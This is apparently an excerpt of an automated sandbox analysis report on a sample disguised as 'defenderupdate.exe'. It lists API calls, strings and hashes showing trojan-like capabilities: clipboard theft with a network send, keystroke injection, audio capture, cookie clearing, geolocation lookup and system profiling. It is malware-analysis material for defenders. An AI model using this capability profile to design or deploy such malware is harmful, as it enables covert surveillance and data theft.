                                                                                                • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                                                • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                                                • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                                                • __freea.LIBCMT ref: 00452DAA
                                                                                                • __freea.LIBCMT ref: 00452DB6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID:
                                                                                                • API String ID: 201697637-0
                                                                                                • Opcode ID: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                • Opcode Fuzzy Hash: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                • _free.LIBCMT ref: 00444714
                                                                                                • _free.LIBCMT ref: 0044472D
                                                                                                • _free.LIBCMT ref: 0044475F
                                                                                                • _free.LIBCMT ref: 00444768
                                                                                                • _free.LIBCMT ref: 00444774
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                                                • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                • Opcode Fuzzy Hash: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                                                • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: gKE$HE$HE
                                                                                                • API String ID: 269201875-2777690135
                                                                                                • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                APIs
                                                                                                • ExitThread.KERNEL32 ref: 004017F4
                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                • String ID: T=G$p[G$>G$>G
                                                                                                • API String ID: 1596592924-2461731529
                                                                                                • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                • String ID: .part
                                                                                                • API String ID: 1303771098-3499674018
                                                                                                • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                APIs
                                                                                                  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                • API String ID: 37874593-703403762
                                                                                                • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                                                • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                                                                • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                                                                • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                                                                • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                • __freea.LIBCMT ref: 00449B37
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                • __freea.LIBCMT ref: 00449B40
                                                                                                • __freea.LIBCMT ref: 00449B65
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3864826663-0
                                                                                                • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                APIs
                                                                                                • SendInput.USER32 ref: 00418B08
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InputSend$Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 1167301434-0
                                                                                                • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00415A46
                                                                                                • EmptyClipboard.USER32 ref: 00415A54
                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID:
                                                                                                • API String ID: 2172192267-0
                                                                                                • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                • __fassign.LIBCMT ref: 0044A180
                                                                                                • __fassign.LIBCMT ref: 0044A19B
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                                • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                APIs
                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                  • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                • Opcode Fuzzy Hash: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                • int.LIBCPMT ref: 0040FC0F
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: P[G
                                                                                                • API String ID: 2536120697-571123470
                                                                                                • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                Strings
                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                • API String ID: 3121278467-91888290
                                                                                                • Opcode ID: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                • Opcode Fuzzy Hash: 8d796e82819d20c7747317835cdf85fb334a8da14db2c504802a4fd71c56bfc3
                                                                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                  • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_9_2_400000_defenderupdate.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 1866151309-2070987746
                                                                                                • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                • Opcode Fuzzy Hash: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\defenderupdate.exe), ref: 00406835
                                                                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                • CoUninitialize.OLE32 ref: 0040688E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
